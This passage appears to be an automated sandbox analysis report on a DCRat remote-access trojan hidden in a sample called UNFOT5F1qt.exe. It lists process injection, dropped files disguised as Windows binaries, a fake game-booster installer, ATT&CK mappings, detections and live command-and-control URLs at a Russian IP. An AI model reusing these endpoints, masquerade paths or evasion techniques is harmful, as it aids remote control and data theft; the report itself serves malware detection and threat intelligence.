                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeCode function: 2_2_004011CF LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetEnvironmentVariableA,2_2_004011CF
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeCode function: 2_2_0040119D mov eax, dword ptr fs:[00000030h]2_2_0040119D
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeCode function: 2_2_004011AF mov eax, dword ptr fs:[00000030h]2_2_004011AF
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeCode function: 2_2_00401AE1 GetCommandLineA,GetModuleHandleA,GetProcessHeap,ExitProcess,2_2_00401AE1
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\regedit\explorer.exeProcess token adjusted: Debug
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    System process connects to network (likely due to code injection or exploit)
                    Source: C:\Windows\regedit\explorer.exeNetwork Connect: 188.120.228.203 80
                    .NET source code references suspicious native API functions
                    Source: 0.2.UNFOT5F1qt.exe.2a77064.0.raw.unpack, Core.csReference to suspicious API methods: OpenProcess(2035711u, 0, P_0)
                    Source: 0.2.UNFOT5F1qt.exe.2a77064.0.raw.unpack, Core.csReference to suspicious API methods: ReadProcessMemory(intPtr, num5, array, num4, ref lpNumberOfBytesRead)
                    Source: 0.2.UNFOT5F1qt.exe.2a77064.0.raw.unpack, Core.csReference to suspicious API methods: VirtualProtectEx(intPtr, (uint)(num5 + i + num6 + 232), 50, 64u, out lpflOldProtect)
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeMemory written: C:\Users\user\Desktop\UNFOT5F1qt.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeProcess created: C:\Users\user\Desktop\UNFOT5F1qt.exe "C:\Users\user\Desktop\UNFOT5F1qt.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeProcess created: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe "C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeProcess created: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe "C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess created: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe "C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe" Jump to behavior
                    Source: savesbrokerDriverSavesbroker.exe, 00000005.00000000.1348990255.0000000000822000.00000002.00000001.01000000.00000007.sdmp, WerFault.exe.5.dr, HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe0.5.dr, WmiPrvSE.exe.5.dr, savesbrokerDriverSavesbroker.exe.2.dr, RuntimeBroker.exe.5.drBinary or memory string: Shell_TrayWndPath
                    Source: savesbrokerDriverSavesbroker.exe, 00000005.00000000.1348990255.0000000000822000.00000002.00000001.01000000.00000007.sdmp, WerFault.exe.5.dr, HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe0.5.dr, WmiPrvSE.exe.5.dr, savesbrokerDriverSavesbroker.exe.2.dr, RuntimeBroker.exe.5.drBinary or memory string: Program ManagerShowHideOpen
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeQueries volume information: C:\Users\user\Desktop\UNFOT5F1qt.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeQueries volume information: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe VolumeInformationJump to behavior
                    Source: C:\Windows\regedit\explorer.exeQueries volume information: C:\Windows\regedit\explorer.exe VolumeInformation
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeQueries volume information: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe VolumeInformation
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeQueries volume information: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe VolumeInformation
                    Source: C:\Windows\regedit\explorer.exeQueries volume information: C:\Windows\regedit\explorer.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeCode function: 7_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,7_2_00406831
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
                    Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                    Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe

                    Stealing of Sensitive Information

                    barindex
                    Yara detected DCRat
                    Source: Yara matchFile source: 5.0.savesbrokerDriverSavesbroker.exe.820000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000017.00000002.1520715428.000000000285A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.1476965095.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1397323956.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.1348990255.0000000000822000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.1426473572.00000000026A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.1476991915.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: savesbrokerDriverSavesbroker.exe PID: 7188, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: WerFault.exe PID: 7604, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 7664, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe PID: 7672, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe PID: 8000, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 616, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\Public\Pictures\RuntimeBroker.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\Default\WmiPrvSE.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Windows\regedit\explorer.exe, type: DROPPED

                    Remote Access Functionality

                    barindex
                    Yara detected DCRat
                    Source: Yara matchFile source: 5.0.savesbrokerDriverSavesbroker.exe.820000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000017.00000002.1520715428.000000000285A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.1476965095.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1397323956.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.1348990255.0000000000822000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.1426473572.00000000026A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.1476991915.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: savesbrokerDriverSavesbroker.exe PID: 7188, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: WerFault.exe PID: 7604, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 7664, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe PID: 7672, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe PID: 8000, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 616, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\Public\Pictures\RuntimeBroker.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\Default\WmiPrvSE.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Windows\regedit\explorer.exe, type: DROPPED

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		11
                    Input Capture                    		2
                    File and Directory Discovery                    		Remote Services1
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts21
                    Native API                    		1
                    Scheduled Task/Job                    		212
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		LSASS Memory17
                    System Information Discovery                    		Remote Desktop Protocol11
                    Input Capture                    		1
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    Scheduled Task/Job                    		21
                    Registry Run Keys / Startup Folder                    		1
                    Scheduled Task/Job                    		4
                    Obfuscated Files or Information                    		Security Account Manager131
                    Security Software Discovery                    		SMB/Windows Admin Shares1
                    Clipboard Data                    		1
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                    Registry Run Keys / Startup Folder                    		2
                    Software Packing                    		NTDS2
                    Process Discovery                    		Distributed Component Object ModelInput Capture111
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Timestomp                    		LSA Secrets31
                    Virtualization/Sandbox Evasion                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading                    		Cached Domain Credentials1
                    Application Window Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items333
                    Masquerading                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                    Virtualization/Sandbox Evasion                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
                    Process Injection                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1563543 Sample: UNFOT5F1qt.exe Startdate: 27/11/2024 Architecture: WINDOWS Score: 100 58 Suricata IDS alerts for network traffic 2->58 60 Found malware configuration 2->60 62 Malicious sample detected (through community Yara rule) 2->62 64 16 other signatures 2->64 8 UNFOT5F1qt.exe 2->8         started        11 explorer.exe 2->11         started        13 explorer.exe 2->13         started        15 2 other processes 2->15 process3 signatures4 74 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 8->74 76 Injects a PE file into a foreign processes 8->76 17 UNFOT5F1qt.exe 10 8->17         started        20 WerFault.exe 19 16 8->20         started        78 Antivirus detection for dropped file 11->78 80 Multi AV Scanner detection for dropped file 11->80 82 Machine Learning detection for dropped file 11->82 84 System process connects to network (likely due to code injection or exploit) 13->84 process5 file6 38 C:\Users\...\savesbrokerDriverSavesbroker.exe, PE32 17->38 dropped 40 C:\Users\user\...\FPS Booster 2.0.7.exe, PE32 17->40 dropped 22 savesbrokerDriverSavesbroker.exe 6 20 17->22         started        26 FPS Booster 2.0.7.exe 15 17->26         started        42 C:\ProgramData\Microsoft\...\Report.wer, Unicode 20->42 dropped process7 file8 44 C:\Windows\regedit\explorer.exe, PE32 22->44 dropped 46 C:\Windows\SysWOW64\...\WerFault.exe, PE32 22->46 dropped 48 C:\Users\Public\Pictures\RuntimeBroker.exe, PE32 22->48 dropped 54 4 other malicious files 22->54 dropped 66 Antivirus detection for dropped file 22->66 68 Multi AV Scanner detection for dropped file 22->68 70 Machine Learning detection for dropped file 22->70 72 7 other signatures 22->72 28 WerFault.exe 14 3 22->28         started        32 schtasks.exe 22->32         started        34 schtasks.exe 22->34         started        36 6 other processes 22->36 50 C:\Users\user\AppData\Local\...\nsDialogs.dll, PE32 26->50 dropped 52 C:\Users\user\AppData\Local\...\System.dll, PE32 26->52 dropped signatures9 process10 dnsIp11 56 188.120.228.203, 49723, 49746, 49767 THEFIRST-ASRU Russian Federation 28->56 86 Antivirus detection for dropped file 28->86 88 Multi AV Scanner detection for dropped file 28->88 90 Machine Learning detection for dropped file 28->90 signatures12

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    UNFOT5F1qt.exe53%ReversingLabsByteCode-MSIL.Trojan.Nekark
                    UNFOT5F1qt.exe100%AviraHEUR/AGEN.1361787
                    UNFOT5F1qt.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe100%AviraHEUR/AGEN.1309950
                    C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe100%AviraHEUR/AGEN.1309950
                    C:\Users\Default\WmiPrvSE.exe100%AviraHEUR/AGEN.1309950
                    C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe100%AviraHEUR/AGEN.1309950
                    C:\Users\Public\Pictures\RuntimeBroker.exe100%AviraHEUR/AGEN.1309950
                    C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe100%AviraHEUR/AGEN.1309950
                    C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe100%AviraHEUR/AGEN.1309950
                    C:\Windows\regedit\explorer.exe100%AviraHEUR/AGEN.1309950
                    C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe100%Joe Sandbox ML
                    C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe100%Joe Sandbox ML
                    C:\Users\Default\WmiPrvSE.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe100%Joe Sandbox ML
                    C:\Users\Public\Pictures\RuntimeBroker.exe100%Joe Sandbox ML
                    C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe100%Joe Sandbox ML
                    C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe100%Joe Sandbox ML
                    C:\Windows\regedit\explorer.exe100%Joe Sandbox ML
                    C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe88%ReversingLabsByteCode-MSIL.Trojan.SpyNoon
                    C:\ProgramData\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe88%ReversingLabsByteCode-MSIL.Trojan.SpyNoon
                    C:\Recovery\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe88%ReversingLabsByteCode-MSIL.Trojan.SpyNoon
                    C:\Users\Default\WmiPrvSE.exe88%ReversingLabsByteCode-MSIL.Trojan.SpyNoon
                    C:\Users\Public\Pictures\RuntimeBroker.exe88%ReversingLabsByteCode-MSIL.Trojan.SpyNoon
                    C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\nss20C1.tmp\System.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\nss20C1.tmp\nsDialogs.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe88%ReversingLabsByteCode-MSIL.Trojan.SpyNoon
                    C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe88%ReversingLabsByteCode-MSIL.Trojan.SpyNoon
                    C:\Windows\regedit\explorer.exe88%ReversingLabsByteCode-MSIL.Trojan.SpyNoon

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://188.120.228.203/MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?8zuOabaF=gPSN2e2E7Tr63&qfhjpvFDRBKGR2CDKyYQ=FUKx&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&8zuOabaF=gPSN2e2E7Tr63&qfhjpvFDRBKGR2CDKyYQ=FUKx100%Avira URL Cloudmalware
                    http://188.120.228.2030%Avira URL Cloudsafe
                    http://188.120.228.203/MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?iXKVlgV1rJUk18ntWeDto2=ehI8yOvjOVLkpjdj5bnrkCHcyD&VUNJCpiqydhhm6jGOqX8J25HRAKN=ZpKuVZPAMJ5G3pF&3BvB63waEtcZG=BeVOYxXxQgUGChc2QNztX9ZLfg3t&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&iXKVlgV1rJUk18ntWeDto2=ehI8yOvjOVLkpjdj5bnrkCHcyD&VUNJCpiqydhhm6jGOqX8J25HRAKN=ZpKuVZPAMJ5G3pF&3BvB63waEtcZG=BeVOYxXxQgUGChc2QNztX9ZLfg3t100%Avira URL Cloudmalware
                    http://188.120.228.203/MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?u94aa9EjMqWeOdgENIA88=a3V2bxddqzBJK7Zui3PhuF6&uzM88ZiIqBiAFihRGs9gdFSiockHtb7=7WHmkffRQ2dI&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&u94aa9EjMqWeOdgENIA88=a3V2bxddqzBJK7Zui3PhuF6&uzM88ZiIqBiAFihRGs9gdFSiockHtb7=7WHmkffRQ2dI100%Avira URL Cloudmalware
                    http://188.120.228.203/MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?x7sAZ9s8LIMWmsWdYRkexiMsvuP818e=MsDQCmtwup8&WOQPE7JGakLPu9OpuuGMn3K4oG=viytIjYVgdA44zY&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&x7sAZ9s8LIMWmsWdYRkexiMsvuP818e=MsDQCmtwup8&WOQPE7JGakLPu9OpuuGMn3K4oG=viytIjYVgdA44zY100%Avira URL Cloudmalware
                    http://188.120.228.203/MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?k1RxxsMic1WB03Lj3Jl0wy=eC69X&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&k1RxxsMic1WB03Lj3Jl0wy=eC69X100%Avira URL Cloudmalware
                    http://188.120.228.203/MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/cores0%Avira URL Cloudsafe
                    https://fpsbooster.ru/api/en/booster/install?is_agree=1/NOCANCELpost0%Avira URL Cloudsafe
                    http://188.120.228.203/MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?iXlp95Y2OIhl=j2BPpjdF4opH2L&pCeLVPpGxY9MMAtCHVPqjeDNU=Qnt5hGtlMMnVQK3wN0qXQFLliw&fNL8Q1g9CW202ckxhZwE=wwQN&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&iXlp95Y2OIhl=j2BPpjdF4opH2L&pCeLVPpGxY9MMAtCHVPqjeDNU=Qnt5hGtlMMnVQK3wN0qXQFLliw&fNL8Q1g9CW202ckxhZwE=wwQN100%Avira URL Cloudmalware
                    https://fpsbooster.ru/api/en/booster/install?is_agree=0https://fps-booster.com/api/software/download0%Avira URL Cloudsafe
                    http://188.120.228.203/MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/@==AbhNnclZXauVHdsVXYmVGZ0%Avira URL Cloudsafe
                    http://188.120.228.203/MathpoolCam/ru0%Avira URL Cloudsafe
                    https://fps-booster.com/api/software/download?branch=master&bits=x64get0%Avira URL Cloudsafe
                    http://188.120.228.203/MathpoolCam/rulemessagerecord/screeX0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    s-part-0035.t-0009.t-msedge.net
                    		13.107.246.63
                    		truefalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://188.120.228.203/MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?x7sAZ9s8LIMWmsWdYRkexiMsvuP818e=MsDQCmtwup8&WOQPE7JGakLPu9OpuuGMn3K4oG=viytIjYVgdA44zY&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&x7sAZ9s8LIMWmsWdYRkexiMsvuP818e=MsDQCmtwup8&WOQPE7JGakLPu9OpuuGMn3K4oG=viytIjYVgdA44zYtrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://188.120.228.203/MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?8zuOabaF=gPSN2e2E7Tr63&qfhjpvFDRBKGR2CDKyYQ=FUKx&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&8zuOabaF=gPSN2e2E7Tr63&qfhjpvFDRBKGR2CDKyYQ=FUKxtrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://188.120.228.203/MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?iXlp95Y2OIhl=j2BPpjdF4opH2L&pCeLVPpGxY9MMAtCHVPqjeDNU=Qnt5hGtlMMnVQK3wN0qXQFLliw&fNL8Q1g9CW202ckxhZwE=wwQN&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&iXlp95Y2OIhl=j2BPpjdF4opH2L&pCeLVPpGxY9MMAtCHVPqjeDNU=Qnt5hGtlMMnVQK3wN0qXQFLliw&fNL8Q1g9CW202ckxhZwE=wwQNtrue
                      • Avira URL Cloud: malware
                      		unknown
